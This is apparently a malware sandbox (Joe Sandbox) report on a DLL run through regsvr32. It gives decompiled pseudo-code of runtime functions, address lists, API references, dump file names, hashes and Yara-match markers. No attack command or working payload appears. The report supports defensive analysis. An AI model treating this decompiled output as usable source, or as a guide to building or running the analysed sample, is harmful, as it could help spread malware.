				_t220 =  *(_t413 - 0x37) & 0x0000ffff;
				 *(_t413 - 0x51) = _t389;
				r9d = _t160 & 0x0000ffff;
				_t161 = _t160 & r10w;
				 *(_t413 - 0x49) = 0;
				r9w = r9w ^ _t220;
				_t221 = _t220 & r10w;
				r9w = r9w & r15w;
				r8d = (_t398 >> 0x10) + _t388;
				 *(_t413 - 0x75) = r9w;
				if (_t221 - r10w >= 0) goto 0x2b07cf7d;
				if (_t161 - r10w >= 0) goto 0x2b07cf7d;
				r11d = 0xbffd;
				if (r8w - r11w > 0) goto 0x2b07cf7d;
				r9d = 0x3fbf;
				if (r8w - r9w > 0) goto 0x2b07cd32;
				 *(_t413 - 0x3d) = _t389;
				 *(_t413 - 0x41) = 0;
				goto 0x2b07cf91;
				if (_t221 != 0) goto 0x2b07cd57;
				r8w = r8w + r12w;
				if (( *(_t413 - 0x39) & 0x7fffffff) != 0) goto 0x2b07cd57;
				if ( *(_t413 - 0x3d) != 0) goto 0x2b07cd57;
				if ( *(_t413 - 0x41) != 0) goto 0x2b07cd57;
				 *(_t413 - 0x37) = 0;
				goto 0x2b07cf91;
				if (_t161 != 0) goto 0x2b07cd72;
				r8w = r8w + r12w;
				if (( *(_t406 + 8) & 0x7fffffff) != 0) goto 0x2b07cd72;
				if ( *((intOrPtr*)(_t406 + 4)) != 0) goto 0x2b07cd72;
				if ( *_t406 == 0) goto 0x2b07cd26;
				r10d = 5;
				r12d = 0;
				_t400 = _t413 - 0x4d;
				r13d = _t440 - 4;
				 *(_t413 - 0x79) = r10d;
				_t435 = _t444 + _t444;
				if (r10d <= 0) goto 0x2b07cde8;
				_t83 = _t406 + 8; // 0xd
				r9d =  *_t83 & 0x0000ffff;
				r11d = 0;
				r9d = r9d * ( *(_t413 + _t435 - 0x41) & 0x0000ffff);
				_t278 = _t388 + _t435;
				if (_t278 -  *((intOrPtr*)(_t400 - 4)) < 0) goto 0x2b07cdc1;
				if (_t278 - r9d >= 0) goto 0x2b07cdc4;
				r11d = r13d;
				 *((intOrPtr*)(_t400 - 4)) = _t278;
				if (r11d == 0) goto 0x2b07cdd0;
				 *_t400 =  *_t400 + r13w;
				r11d =  *(_t413 - 0x79);
				r11d = r11d - r13d;
				 *(_t413 - 0x79) = r11d;
				if (r11d > 0) goto 0x2b07cda2;
				r10d = r10d - r13d;
				r12d = r12d + r13d;
				if (r10d > 0) goto 0x2b07cd83;
				r10d =  *(_t413 - 0x49);
				r9d =  *(_t413 - 0x51);
				r8w = r8w + 0xc002;
				r14d = 0xffff;
				if (r8w <= 0) goto 0x2b07ce58;
				if ((0x80000000 & r10d) != 0) goto 0x2b07ce52;
				r11d =  *(_t413 - 0x4d);
				r10d = r10d + r10d;
				r9d = r9d + r9d;
				r8w = r8w + r14w;
				r10d = r10d | r11d >> 0x0000001f;
				 *(_t413 - 0x51) = r9d;
				 *(_t413 - 0x4d) = _t443 + _t443 | r9d >> 0x0000001f;
				 *(_t413 - 0x49) = r10d;
				if (r8w > 0) goto 0x2b07ce19;
				_t367 = r8w;
				if (_t367 > 0) goto 0x2b07cec2;
				r8w = r8w + r14w;
				if (_t367 >= 0) goto 0x2b07cec2;
				r8w = r8w + ( ~(r8w & 0xffffffff) & 0x0000ffff);
				_t368 =  *(_t413 - 0x51) & r13b;
				if (_t368 == 0) goto 0x2b07ce77;
				r11d =  *(_t413 - 0x4d);
				r9d = r9d >> 1;
				r11d = r11d >> 1;
				_t225 = r11d << 0x1f;
				r11d = r11d | r10d << 0x0000001f;
				r10d = r10d >> 1;
				r9d = r9d | _t225;
				 *(_t413 - 0x4d) = r11d;
				 *(_t413 - 0x51) = r9d;
				if (_t368 != 0) goto 0x2b07ce6e;
				 *(_t413 - 0x49) = r10d;
				if (0 + r13d == 0) goto 0x2b07cec2;
				 *(_t413 - 0x51) = r9w & 0xffffffff | r13w;
				r9d =  *(_t413 - 0x51);
				goto 0x2b07cec6;
				r15d = 0x8000;
				if (( *(_t413 - 0x51) & 0x0000ffff) - r15w > 0) goto 0x2b07cee6;
				r9d = r9d & 0x0001ffff;
				if (r9d != 0x18000) goto 0x2b07cf36;
				_t226 = _t225 | 0xffffffff;
				r12d = 1;
				if ( *(_t413 - 0x4f) != _t226) goto 0x2b07cf2e;
				 *(_t413 - 0x4f) = 0;
				if ( *((intOrPtr*)(_t413 - 0x4b)) != _t226) goto 0x2b07cf22;
				_t177 =  *(_t413 - 0x47) & 0x0000ffff;
				 *((intOrPtr*)(_t413 - 0x4b)) = 0;
				if (_t177 != r14w) goto 0x2b07cf18;
				 *(_t413 - 0x47) = r15w;
				r8w = r8w + r12w;
				goto 0x2b07cf28;
				_t178 = _t177 + r12w;
				 *(_t413 - 0x47) = _t178;
				goto 0x2b07cf28;
				_t179 = _t178 + r12d;
				 *((intOrPtr*)(_t413 - 0x4b)) = _t179;
				r10d =  *(_t413 - 0x49);
				goto 0x2b07cf3c;
				 *(_t413 - 0x4f) = _t179 + r12d;
				goto 0x2b07cf3c;
				r12d = 1;
				if (r8w - 0x7fff < 0) goto 0x2b07cf59;
				r10d = 0x7fff;
				goto 0x2b07cf81;
				r8w = r8w |  *(_t413 - 0x75);
				 *(_t413 - 0x3b) = r10d;
				 *(_t413 - 0x41) =  *(_t413 - 0x4f) & 0x0000ffff;
				_t185 =  *(_t413 - 0x4d);
				 *(_t413 - 0x37) = r8w;
				 *(_t413 - 0x3f) = _t185;
				r10d = 0x7fff;
				goto 0x2b07cf91;
				r9w =  ~r9w;
				asm("sbb eax, eax");
				 *(_t413 - 0x41) = _t389;
				 *(_t413 - 0x39) = (_t185 & 0x80000000) + 0x7fff8000;
				if ( *(_t413 - 0x71) != 0) goto 0x2b07cc7f;
				goto 0x2b07cfe0;
				goto 0x2b07cfe0;
				goto 0x2b07cfe0;
				_t433 =  *((intOrPtr*)(_t413 - 0x59));
				 *(_t433 + 0xa) = 2 |  *(_t413 - 0x6d);
				 *_t433 = 2;
				 *((intOrPtr*)(_t433 + 2)) = 2;
				 *((intOrPtr*)(_t433 + 6)) = 2;
				return E00007FFD7FFD2B064980(2,  *(_t413 - 1) ^ _t415 - 0x000000a0, _t406 - 0x7ffd2b0c86f4, _t433);
			}

0x7ffd2b07c7c0
0x7ffd2b07c7c0
0x7ffd2b07c7c6
0x7ffd2b07c7c8
0x7ffd2b07c7d0
0x7ffd2b07c7dc
0x7ffd2b07c7e3
0x7ffd2b07c7e6
0x7ffd2b07c7ea
0x7ffd2b07c7f0
0x7ffd2b07c7f4
0x7ffd2b07c7f4
0x7ffd2b07c7f8
0x7ffd2b07c7fc
0x7ffd2b07c800
0x7ffd2b07c804
0x7ffd2b07c80a
0x7ffd2b07c80e
0x7ffd2b07c811
0x7ffd2b07c814
0x7ffd2b07c819
0x7ffd2b07c821
0x7ffd2b07c823
0x7ffd2b07c828
0x7ffd2b07c82e
0x7ffd2b07c835
0x7ffd2b07c83d
0x7ffd2b07c842
0x7ffd2b07c846
0x7ffd2b07c84a
0x7ffd2b07c84e
0x7ffd2b07c853
0x7ffd2b07c858
0x7ffd2b07c85e
0x7ffd2b07c864
0x7ffd2b07c86a
0x7ffd2b07c86f
0x7ffd2b07c875
0x7ffd2b07c878
0x7ffd2b07c87e
0x7ffd2b07c881
0x7ffd2b07c887
0x7ffd2b07c88a
0x7ffd2b07c890
0x7ffd2b07c893
0x7ffd2b07c899
0x7ffd2b07c89f
0x7ffd2b07c8a2
0x7ffd2b07c8a8
0x7ffd2b07c8aa
0x7ffd2b07c8ac
0x7ffd2b07c8af
0x7ffd2b07c8b2
0x7ffd2b07c8b8
0x7ffd2b07c8ba
0x7ffd2b07c8bf
0x7ffd2b07c8c4
0x7ffd2b07c8c9
0x7ffd2b07c8cc
0x7ffd2b07c8cf
0x7ffd2b07c8d2
0x7ffd2b07c8d5
0x7ffd2b07c8de
0x7ffd2b07c8e3
0x7ffd2b07c8e8
0x7ffd2b07c8ed
0x7ffd2b07c8f6
0x7ffd2b07c8f8
0x7ffd2b07c8fe
0x7ffd2b07c909
0x7ffd2b07c90e
0x7ffd2b07c916
0x7ffd2b07c91b
0x7ffd2b07c923
0x7ffd2b07c926
0x7ffd2b07c92b
0x7ffd2b07c930
0x7ffd2b07c937
0x7ffd2b07c93d
0x7ffd2b07c93f
0x7ffd2b07c942
0x7ffd2b07c94a
0x7ffd2b07c95c
0x7ffd2b07c963
0x7ffd2b07c96d
0x7ffd2b07c974
0x7ffd2b07c97d
0x7ffd2b07c992
0x7ffd2b07c999
0x7ffd2b07c99f
0x7ffd2b07c9a7
0x7ffd2b07c9ad
0x7ffd2b07c9b6
0x7ffd2b07c9be
0x7ffd2b07c9c4
0x7ffd2b07c9c9
0x7ffd2b07c9cf
0x7ffd2b07c9e1
0x7ffd2b07c9ea
0x7ffd2b07c9f3
0x7ffd2b07c9fc
0x7ffd2b07c9fe
0x7ffd2b07ca08
0x7ffd2b07ca12
0x7ffd2b07ca19
0x7ffd2b07ca1e
0x7ffd2b07ca27
0x7ffd2b07ca2c
0x7ffd2b07ca31
0x7ffd2b07ca37
0x7ffd2b07ca3d
0x7ffd2b07ca40
0x7ffd2b07ca4a
0x7ffd2b07ca51
0x7ffd2b07ca5b
0x7ffd2b07ca5f
0x7ffd2b07ca64
0x7ffd2b07ca67
0x7ffd2b07ca6b
0x7ffd2b07ca6e
0x7ffd2b07ca79
0x7ffd2b07ca7e
0x7ffd2b07ca81
0x7ffd2b07ca85
0x7ffd2b07ca8b
0x7ffd2b07ca8e
0x7ffd2b07ca90
0x7ffd2b07ca93
0x7ffd2b07ca95
0x7ffd2b07ca98
0x7ffd2b07caa2
0x7ffd2b07caab
0x7ffd2b07cab4
0x7ffd2b07cab9
0x7ffd2b07cabf
0x7ffd2b07cac8
0x7ffd2b07cad2
0x7ffd2b07cad7
0x7ffd2b07cadd
0x7ffd2b07cae0
0x7ffd2b07cae2
0x7ffd2b07caeb
0x7ffd2b07caed
0x7ffd2b07caf3
0x7ffd2b07cafe
0x7ffd2b07cb08
0x7ffd2b07cb0f
0x7ffd2b07cb17
0x7ffd2b07cb22
0x7ffd2b07cb2a
0x7ffd2b07cb30
0x7ffd2b07cb35
0x7ffd2b07cb3a
0x7ffd2b07cb3c
0x7ffd2b07cb46
0x7ffd2b07cb48
0x7ffd2b07cb4d
0x7ffd2b07cb50
0x7ffd2b07cb52
0x7ffd2b07cb58
0x7ffd2b07cb5b
0x7ffd2b07cb5e
0x7ffd2b07cb63
0x7ffd2b07cb6b
0x7ffd2b07cb75
0x7ffd2b07cb77
0x7ffd2b07cb80
0x7ffd2b07cb82
0x7ffd2b07cb89
0x7ffd2b07cb8e
0x7ffd2b07cb9d
0x7ffd2b07cb9f
0x7ffd2b07cba7
0x7ffd2b07cbad
0x7ffd2b07cbb1
0x7ffd2b07cbb7
0x7ffd2b07cbc0
0x7ffd2b07cbc2
0x7ffd2b07cbc7
0x7ffd2b07cbcc
0x7ffd2b07cbd7
0x7ffd2b07cbdc
0x7ffd2b07cbe8
0x7ffd2b07cbef
0x7ffd2b07cbf2
0x7ffd2b07cbf8
0x7ffd2b07cc04
0x7ffd2b07cc0c
0x7ffd2b07cc16
0x7ffd2b07cc1e
0x7ffd2b07cc29
0x7ffd2b07cc35
0x7ffd2b07cc48
0x7ffd2b07cc4e
0x7ffd2b07cc60
0x7ffd2b07cc62
0x7ffd2b07cc68
0x7ffd2b07cc73
0x7ffd2b07cc79
0x7ffd2b07cc8b
0x7ffd2b07cc8e
0x7ffd2b07cc92
0x7ffd2b07cc9a
0x7ffd2b07cca4
0x7ffd2b07ccad
0x7ffd2b07ccaf
0x7ffd2b07ccb5
0x7ffd2b07ccb9
0x7ffd2b07ccc1
0x7ffd2b07ccc7
0x7ffd2b07ccca
0x7ffd2b07ccce
0x7ffd2b07ccd2
0x7ffd2b07ccd6
0x7ffd2b07ccda
0x7ffd2b07ccde
0x7ffd2b07cce1
0x7ffd2b07cce5
0x7ffd2b07cce9
0x7ffd2b07cced
0x7ffd2b07ccf1
0x7ffd2b07ccfa
0x7ffd2b07cd04
0x7ffd2b07cd0a
0x7ffd2b07cd14
0x7ffd2b07cd1a
0x7ffd2b07cd24
0x7ffd2b07cd26
0x7ffd2b07cd2a
0x7ffd2b07cd2d
0x7ffd2b07cd35
0x7ffd2b07cd37
0x7ffd2b07cd42
0x7ffd2b07cd47
0x7ffd2b07cd4c
0x7ffd2b07cd4e
0x7ffd2b07cd52
0x7ffd2b07cd5a
0x7ffd2b07cd5c
0x7ffd2b07cd67
0x7ffd2b07cd6c
0x7ffd2b07cd70
0x7ffd2b07cd72
0x7ffd2b07cd78
0x7ffd2b07cd7b
0x7ffd2b07cd7f
0x7ffd2b07cd87
0x7ffd2b07cd8b
0x7ffd2b07cd91
0x7ffd2b07cd9b
0x7ffd2b07cda6
0x7ffd2b07cdaa
0x7ffd2b07cdad
0x7ffd2b07cdb4
0x7ffd2b07cdba
0x7ffd2b07cdbf
0x7ffd2b07cdc1
0x7ffd2b07cdc4
0x7ffd2b07cdca
0x7ffd2b07cdcc
0x7ffd2b07cdd0
0x7ffd2b07cddc
0x7ffd2b07cddf
0x7ffd2b07cde6
0x7ffd2b07cde8
0x7ffd2b07cdef
0x7ffd2b07cdf5
0x7ffd2b07cdf7
0x7ffd2b07cdfb
0x7ffd2b07ce04
0x7ffd2b07ce0d
0x7ffd2b07ce17
0x7ffd2b07ce1c
0x7ffd2b07ce1e
0x7ffd2b07ce25
0x7ffd2b07ce2b
0x7ffd2b07ce38
0x7ffd2b07ce3e
0x7ffd2b07ce41
0x7ffd2b07ce45
0x7ffd2b07ce48
0x7ffd2b07ce50
0x7ffd2b07ce52
0x7ffd2b07ce56
0x7ffd2b07ce58
0x7ffd2b07ce5c
0x7ffd2b07ce6a
0x7ffd2b07ce6e
0x7ffd2b07ce72
0x7ffd2b07ce77
0x7ffd2b07ce7e
0x7ffd2b07ce87
0x7ffd2b07ce8a
0x7ffd2b07ce8d
0x7ffd2b07ce90
0x7ffd2b07ce93
0x7ffd2b07ce99
0x7ffd2b07ce9d
0x7ffd2b07cea1
0x7ffd2b07cea5
0x7ffd2b07ceae
0x7ffd2b07ceb8
0x7ffd2b07cebc
0x7ffd2b07cec0
0x7ffd2b07ceca
0x7ffd2b07ced4
0x7ffd2b07ced6
0x7ffd2b07cee4
0x7ffd2b07cee9
0x7ffd2b07ceec
0x7ffd2b07cef4
0x7ffd2b07cef9
0x7ffd2b07cefe
0x7ffd2b07cf00
0x7ffd2b07cf04
0x7ffd2b07cf0b
0x7ffd2b07cf0d
0x7ffd2b07cf12
0x7ffd2b07cf16
0x7ffd2b07cf18
0x7ffd2b07cf1c
0x7ffd2b07cf20
0x7ffd2b07cf22
0x7ffd2b07cf25
0x7ffd2b07cf28
0x7ffd2b07cf2c
0x7ffd2b07cf31
0x7ffd2b07cf34
0x7ffd2b07cf36
0x7ffd2b07cf48
0x7ffd2b07cf4e
0x7ffd2b07cf57
0x7ffd2b07cf5d
0x7ffd2b07cf62
0x7ffd2b07cf66
0x7ffd2b07cf6a
0x7ffd2b07cf6d
0x7ffd2b07cf72
0x7ffd2b07cf75
0x7ffd2b07cf7b
0x7ffd2b07cf7d
0x7ffd2b07cf81
0x7ffd2b07cf83
0x7ffd2b07cf8e
0x7ffd2b07cf93
0x7ffd2b07cfa9
0x7ffd2b07cfb9
0x7ffd2b07cfcf
0x7ffd2b07cfe0
0x7ffd2b07cfe8
0x7ffd2b07cfef
0x7ffd2b07cff3
0x7ffd2b07cff7
0x7ffd2b07d021

APIs

_errno.LIBCMT ref: 00007FFD2B07C823
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B07C82E

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: f9810067b0f9d9330d3ae48b96d59794a7ec36c49d8bea39d4c0c4633fa7597d
Instruction ID: 4e373d351a4a8e2c9878f8dff891a154dd2554a7e0ec3b94c7df42c1f52e130d
Opcode Fuzzy Hash: f9810067b0f9d9330d3ae48b96d59794a7ec36c49d8bea39d4c0c4633fa7597d
Instruction Fuzzy Hash: 78320772F0A1428AF7768F6499647BCA7A2FB12748F500036DE4D536E5CEBCA945F380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B077910 Relevance: 3.1, APIs: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00007FFD7FFD2B077910(void* __ecx, void* __edx, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __rbp, void* __r8, void* __r9, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v152;
				signed int _t20;
				signed int _t38;
				signed long long _t45;
				signed long long _t46;
				signed long long _t59;
				void* _t63;

				_a16 = __rbx;
				_a24 = __rsi;
				_t45 =  *0x2b0c70a0; // 0xf787487f4682
				_t46 = _t45 ^ _t63 - 0x000000b0;
				_v24 = _t46;
				E00007FFD7FFD2B067F5C(__ecx, __eflags, _t46, __rcx, __rsi, __r8);
				_t59 = _t46;
				_t20 = E00007FFD7FFD2B0778B8(__rcx, __rdx, __r9);
				r9d = 0x78;
				asm("sbb edx, edx");
				_t38 = _t20;
				if (GetLocaleInfoA(??, ??, ??, ??) != 0) goto 0x2b077983;
				 *(_t59 + 0x150) = 0;
				goto 0x2b0779d0;
				if (E00007FFD7FFD2B07A374(_t46,  *((intOrPtr*)(_t59 + 0x148))) != 0) goto 0x2b0779c2;
				if (_t38 ==  *0x2b085bb0) goto 0x2b0779c2;
				if (1 - 0xa < 0) goto 0x2b07799f;
				 *(_t59 + 0x150) =  *(_t59 + 0x150) | 0x00000004;
				 *((intOrPtr*)(_t59 + 0x164)) = _t38;
				 *((intOrPtr*)(_t59 + 0x160)) = _t38;
				return E00007FFD7FFD2B064980(_t20, _v24 ^ _t63 - 0x000000b0,  &_v152,  &_v152);
			}

0x7ffd2b077910
0x7ffd2b077915
0x7ffd2b077922
0x7ffd2b077929
0x7ffd2b07792c
0x7ffd2b077937
0x7ffd2b07793f
0x7ffd2b077942
0x7ffd2b077954
0x7ffd2b07795a
0x7ffd2b07795e
0x7ffd2b077976
0x7ffd2b077978
0x7ffd2b077981
0x7ffd2b077996
0x7ffd2b0779a2
0x7ffd2b0779ad
0x7ffd2b0779af
0x7ffd2b0779b6
0x7ffd2b0779bc
0x7ffd2b0779f4

APIs

_getptd.LIBCMT ref: 00007FFD2B077937

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

GetLocaleInfoA.KERNEL32 ref: 00007FFD2B07796C

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: InfoLocale_amsg_exit_getptd
String ID:
API String ID: 488165793-0
Opcode ID: 99d8fc483b43fa74d6726426d958393f6aa3a2221fe15baf5fcb0f4f79432ae5
Instruction ID: 01c59478baf8b3f013deb1b357416fdaa9ec8012e7ab409ec5cc95d9828fd0f1
Opcode Fuzzy Hash: 99d8fc483b43fa74d6726426d958393f6aa3a2221fe15baf5fcb0f4f79432ae5
Instruction Fuzzy Hash: 9321B032B0AA8186EB268B20D9553EAB3A1FB8A780F440135DA5D47364DF7CF414D780

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002C5C Relevance: 2.9, Strings: 2, Instructions: 355COMMON

Download Yara Rule

Strings

5R, xrefs: 0000000180003111
[TZy, xrefs: 0000000180002D0D

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5R$[TZy
API String ID: 0-2326696573
Opcode ID: 4061b22af4a1fcad17aa3137ff0b01521b67a12185eeaaec32ffa6dee00a71e1
Instruction ID: 389918b5170f5b25bf030d3dcbfaac28bda9751d729b4d2c05917da80ede6c06
Opcode Fuzzy Hash: 4061b22af4a1fcad17aa3137ff0b01521b67a12185eeaaec32ffa6dee00a71e1
Instruction Fuzzy Hash: 0E02437190670CCBEBA8CF68C08A6DD7BF1FF58344F10412AF916A62A1C775D929CB49

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002228C Relevance: 2.8, Strings: 2, Instructions: 282COMMON

Download Yara Rule

Strings

I,, xrefs: 00000001800225D2
"&{, xrefs: 00000001800223F7

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "&{$I,
API String ID: 0-3188669710
Opcode ID: e9a85c233bd586419d6d1f90df48442ea2ad5a1eeef0db758a5bd0de9940da0b
Instruction ID: 222759c20f68d3f4b5b0f6f241bbe03cdc40b4d5f2e521a8a119161d8b60415b
Opcode Fuzzy Hash: e9a85c233bd586419d6d1f90df48442ea2ad5a1eeef0db758a5bd0de9940da0b
Instruction Fuzzy Hash: EAD1477090424CCBDF59DFA8D4896DDBFB0FF48398F148229E81AAB294C7749589CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180027F1C Relevance: 2.8, Strings: 2, Instructions: 259COMMON

Download Yara Rule

Strings

S+-=, xrefs: 0000000180028282
B, xrefs: 0000000180028035

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: S+-=$B
API String ID: 0-4075300536
Opcode ID: 1b104f60c6984b61bb84a53f34dbd55ee8b9a8ecbab449b62d83d0f18d81ae79
Instruction ID: c8eb2d7a1a7d369eab29ad9377378876a35e0e6ad5d0998490d43091655a97b4
Opcode Fuzzy Hash: 1b104f60c6984b61bb84a53f34dbd55ee8b9a8ecbab449b62d83d0f18d81ae79
Instruction Fuzzy Hash: 98C1F3B0504609EFDB98CF28C19AADE7BB0FF48308F41816DF84A9B294D774DA19DB45

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000BBD4 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

V, xrefs: 000000018000C030
8, xrefs: 000000018000BF46

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: V$8
API String ID: 0-3038727020
Opcode ID: b0041f3bed1d0949c34ee59443941f357a402f5554648ebe8c95ce9b8e07ea6e
Instruction ID: 5ac949c8593714071b1b11e0aacbc4dce9392d9cb92b8871a05392379d3c50f4
Opcode Fuzzy Hash: b0041f3bed1d0949c34ee59443941f357a402f5554648ebe8c95ce9b8e07ea6e
Instruction Fuzzy Hash: 04D1D6706087C98FDBBECF24C8857DA7BA8FB46748F504219E98A8F294DB745744CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002B39C Relevance: 2.7, Strings: 2, Instructions: 177COMMON

Download Yara Rule

Strings

WP, xrefs: 000000018002B5BB
S, xrefs: 000000018002B520

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: WP$S
API String ID: 0-2697376140
Opcode ID: 3d708d70d76f0700e0894de13dd9a06e4866e9a6e32e4962c3402fce254a3e72
Instruction ID: 5cfe9600d47a91dc8925a338af92b553ebf052a5c0f22b5b567fe9e17141e270
Opcode Fuzzy Hash: 3d708d70d76f0700e0894de13dd9a06e4866e9a6e32e4962c3402fce254a3e72
Instruction Fuzzy Hash: EB81F3715087458FD368DF28C19962EBBF1FBC6348F004A2DF6868B290D776D918CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800258E8 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

L, xrefs: 00000001800259A1
Qx, xrefs: 000000018002592A

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Qx$L
API String ID: 0-2782989848
Opcode ID: 8fdb5e7dade6d60b1a023724f9ad65d4b9c7cb52a9aefd581f2ba1f674d3d8b7
Instruction ID: 86f1aab570044b1986f6f1a38bd001868b3a410fe39ff9124833257a8da7a951
Opcode Fuzzy Hash: 8fdb5e7dade6d60b1a023724f9ad65d4b9c7cb52a9aefd581f2ba1f674d3d8b7
Instruction Fuzzy Hash: 93515E702187449FD3A9DF18C4867ABB7E0FB89710F50892DE4CE83251DB74A8898B47

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003990 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

K"], xrefs: 0000000180003C4C
w0]l, xrefs: 0000000180003B57

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: K"]$w0]l
API String ID: 0-2106158253
Opcode ID: a5018aec71ebb3022343b7d4a0fb5606dbe826906eb6b70e798fdd21a72ecac3
Instruction ID: 28f6610df90e400b74c9245c8dd2af4ed90ca0debc87349359620d6bc3ddf6ac
Opcode Fuzzy Hash: a5018aec71ebb3022343b7d4a0fb5606dbe826906eb6b70e798fdd21a72ecac3
Instruction Fuzzy Hash: EC91D77194578CCBEBBACF64C88AADD7BB0FB48304F20421DD85A9B261DB759645CF01

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000FDE4 Relevance: 2.6, Strings: 2, Instructions: 146COMMON

Download Yara Rule

Strings

+, xrefs: 000000018000FECC
g9, xrefs: 000000018000FEBE

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +$g9
API String ID: 0-976055154
Opcode ID: 1d4c2adde26999b1ce8492b11b9689b55179302074b7a3fd914b605d443a9b9b
Instruction ID: e997ee4772f8913f01ceadaddcaecfb2df49ceac954d9b4241f0023d572f2cf6
Opcode Fuzzy Hash: 1d4c2adde26999b1ce8492b11b9689b55179302074b7a3fd914b605d443a9b9b
Instruction Fuzzy Hash: E2511D70D0464E8BEB98DFA8C4453FEBAF1FB48344F108529E416E6391C7785A498F95

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800245D0 Relevance: 2.6, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

=R, xrefs: 0000000180024658
xE, xrefs: 000000018002469B

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =R$xE
API String ID: 0-545514718
Opcode ID: f44d21e5aaee4d09a7906727ccc28054b3bfd477728245e5ecf97a954938050c
Instruction ID: 1e4118fee573a7361052f8509598bb041a5c7e32ecd80efb7901b63fbf11df44
